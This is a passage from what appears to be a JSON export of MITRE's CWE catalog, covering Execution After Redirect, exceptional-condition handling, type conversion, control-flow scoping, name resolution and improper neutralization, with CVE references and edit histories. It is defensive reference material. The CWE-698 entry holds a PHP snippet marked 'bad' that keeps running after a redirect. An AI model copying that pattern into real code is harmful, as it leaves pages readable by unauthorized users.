infoleak","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10003"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"10"}},{"attr":{"@_CAPEC_ID":"120"}},{"attr":{"@_CAPEC_ID":"14"}},{"attr":{"@_CAPEC_ID":"15"}},{"attr":{"@_CAPEC_ID":"182"}},{"attr":{"@_CAPEC_ID":"24"}},{"attr":{"@_CAPEC_ID":"267"}},{"attr":{"@_CAPEC_ID":"3"}},{"attr":{"@_CAPEC_ID":"34"}},{"attr":{"@_CAPEC_ID":"41"}},{"attr":{"@_CAPEC_ID":"43"}},{"attr":{"@_CAPEC_ID":"44"}},{"attr":{"@_CAPEC_ID":"45"}},{"attr":{"@_CAPEC_ID":"46"}},{"attr":{"@_CAPEC_ID":"47"}},{"attr":{"@_CAPEC_ID":"52"}},{"attr":{"@_CAPEC_ID":"53"}},{"attr":{"@_CAPEC_ID":"6"}},{"attr":{"@_CAPEC_ID":"64"}},{"attr":{"@_CAPEC_ID":"67"}},{"attr":{"@_CAPEC_ID":"7"}},{"attr":{"@_CAPEC_ID":"71"}},{"attr":{"@_CAPEC_ID":"73"}},{"attr":{"@_CAPEC_ID":"78"}},{"attr":{"@_CAPEC_ID":"79"}},{"attr":{"@_CAPEC_ID":"8"}},{"attr":{"@_CAPEC_ID":"80"}},{"attr":{"@_CAPEC_ID":"88"}},{"attr":{"@_CAPEC_ID":"9"}},{"attr":{"@_CAPEC_ID":"92"}}]},"Notes":{"Note":{"#text":"This entry likely has some relationships with case sensitivity (CWE-178), but case sensitivity is a factor in other types of weaknesses besides comparison.  Also, in cryptography, certain attacks are possible when certain comparison operations do not take place in constant time, causing a timing-related information leak (CWE-208).","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Name, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Insufficient Comparison","attr":{"@_Date":"2018-03-27"}}}},"698":{"attr":{"@_ID":"698","@_Name":"Execution After Redirect (EAR)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The web application sends a redirect to another location, but instead of exiting, it executes additional code.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"705","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"670","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Alternate_Terms":{"Alternate_Term":{"Term":"Redirect Without Exit"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Other","Confidentiality","Integrity","Availability"],"Impact":["Alter Execution Logic","Execute Unauthorized Code or Commands"],"Note":"This weakness could affect the control flow of the application and allow execution of untrusted code."}},"Detection_Methods":{"Detection_Method":{"Method":"Black Box","Description":"This issue might not be detected if testing is performed using a web browser, because the browser might obey the redirect and move the user to a different page before the application has produced outputs that indicate something is amiss."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code queries a server and displays its status when a request comes from an authorized IP address.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$requestingIP = $_SERVER[\'REMOTE_ADDR\'];if(!in_array($requestingIP,$ipAllowList)){}$status = getServerStatus();echo $status;","xhtml:br":["","","","",""],"xhtml:div":{"#text":"echo \\"You are not authorized to view this page\\";http_redirect($errorPageURL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:i":"..."}},"Body_Text":"This code redirects unauthorized users, but continues to execute code after calling http_redirect(). This means even unauthorized users may be able to access the contents of the page or perform a DoS attack on the server being queried. Also, note that this code is vulnerable to an IP address spoofing attack (CWE-212)."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2013-1402","Description":"Execution-after-redirect allows access to application configuration details.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1402"},{"Reference":"CVE-2009-1936","Description":"chain: library file sends a redirect if it is directly requested but continues to execute, allowing remote file inclusion and path traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1936"},{"Reference":"CVE-2007-2713","Description":"Remote attackers can obtain access to administrator functionality through EAR.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2713"},{"Reference":"CVE-2007-4932","Description":"Remote attackers can obtain access to administrator functionality through EAR.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4932"},{"Reference":"CVE-2007-5578","Description":"Bypass of authentication step through EAR.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5578"},{"Reference":"CVE-2007-2713","Description":"Chain: Execution after redirect triggers eval injection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2713"},{"Reference":"CVE-2007-6652","Description":"chain: execution after redirect allows non-administrator to perform static code injection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6652"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-565"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Alternate_Terms, Name, Observed_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":{"#text":"Redirect Without Exit","attr":{"@_Date":"2013-02-21"}}}},"703":{"attr":{"@_ID":"703","@_Name":"Improper Check or Handling of Exceptional Conditions","@_Abstraction":"Pillar","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly anticipate or handle exceptional conditions that rarely occur during normal operation of the software.","Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Availability","Integrity"],"Impact":["Read Application Data","DoS: Crash, Exit, or Restart","Unexpected State"]}},"Detection_Methods":{"Detection_Method":[{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fault Injection - source code","Fault Injection - binary"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Forced Path Execution"}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}}]}},"Effectiveness":"High"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR06-J","Entry_Name":"Do not throw undeclared checked exceptions"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-567"}},{"attr":{"@_External_Reference_ID":"REF-568"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 8: C++ Catastrophes.&#34; Page 143"}}]},"Notes":{"Note":{"#text":"This is a high-level class that might have some overlap with other classes. It could be argued that even \\"normal\\" weaknesses such as buffer overflows involve unusual or exceptional conditions. In that sense, this might be an inherent aspect of most other weaknesses within CWE, similar to API Abuse (CWE-227) and Indicator of Poor Code Quality (CWE-398). However, this entry is currently intended to unify disparate concepts that do not have other places within the Research Concepts view (CWE-1000).","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09","Submission_Comment":"Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0."},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Failure to Handle Exceptional Conditions","attr":{"@_Date":"2010-12-13"}}}},"704":{"attr":{"@_ID":"704","@_Name":"Incorrect Type Conversion or Cast","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not correctly convert an object, resource, or structure from one type to a different type.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"C++","@_Prevalence":"Often"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP05-C","Entry_Name":"Do not cast away a const qualification"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP39-C","Entry_Name":"Do not access a variable through a pointer of an incompatible type","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT31-C","Entry_Name":"Ensure that integer conversions do not result in lost or misinterpreted data","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT36-C","Entry_Name":"Converting a pointer to integer or integer to pointer","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR34-C","Entry_Name":"Cast characters to unsigned types before converting to larger integer sizes","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR37-C","Entry_Name":"Arguments to character handling functions must be representable as an unsigned char","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"},{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-CWE-704"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-CWE-704"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09","Submission_Comment":"Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0."},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"705":{"attr":{"@_ID":"705","@_Name":"Incorrect Control Flow Scoping","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly return control flow to the proper location after it has completed a task or detected an unusual condition.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Alter Execution Logic","Other"]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2014-1266","Description":"chain: incorrect \\"goto\\" in Apple SSL product bypasses certificate validation, allowing Adversary-in-the-Middle (AITM) attack (Apple \\"goto fail\\" bug). CWE-705 (Incorrect Control Flow Scoping) -&gt; CWE-561 (Dead Code) -&gt; CWE-295 (Improper Certificate Validation) -&gt; CWE-393 (Return of Wrong Status Code) -&gt; CWE-300 (Channel Accessible by Non-Endpoint).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1266"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ENV32-C","Entry_Name":"All exit handlers must return normally","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR04-C","Entry_Name":"Choose an appropriate termination strategy"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"THI05-J","Entry_Name":"Do not use Thread.stop() to terminate threads"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR04-J","Entry_Name":"Do not complete abruptly from a finally block"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR05-J","Entry_Name":"Do not let checked exceptions escape from a finally block"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP31-PL","Entry_Name":"Do not suppress or ignore exceptions","Mapping_Fit":"Imprecise"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09","Submission_Comment":"Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0."},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}]}},"706":{"attr":{"@_ID":"706","@_Name":"Use of Incorrectly-Resolved Name or Reference","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a name or reference to access a resource, but the name/reference resolves to a resource that is outside of the intended control sphere.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"99","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"159"}},{"attr":{"@_CAPEC_ID":"177"}},{"attr":{"@_CAPEC_ID":"48"}},{"attr":{"@_CAPEC_ID":"641"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09","Submission_Comment":"Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0."},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"707":{"attr":{"@_ID":"707","@_Name":"Improper Neutralization","@_Abstraction":"Pillar","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product does not ensure or incorrectly ensures that structured messages or data are well-formed and that certain security properties are met before being read from an upstream component or sent to a downstream component.","Extended_Description":{"xhtml:p":["If a message is malformed, it may cause the message to be incorrectly interpreted.","Neutralization is an abstract term for any technique that ensures that input (and output) conforms with expectations and is \\"safe.\\"  This can be done by:","This weakness typically applies in cases where the product prepares a control message that another process must act on, such as a command or query, and malicious input that was intended as data, can enter the control plane instead. However, this weakness also applies to more general cases where there are not always control implications."],"xhtml:ul":{"xhtml:li":["checking that the input/output is already \\"safe\\" (e.g. validation)","transformation of the input/output to be \\"safe\\" using techniques such as filtering, encoding/decoding, escaping/unescaping, quoting/unquoting, or canonicalization","preventing the input/output from being directly provided by an attacker (e.g. \\"indirect selection\\" that maps externally-provided values to internally-controlled values)","preventing the input/output from being processed at all"]}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security 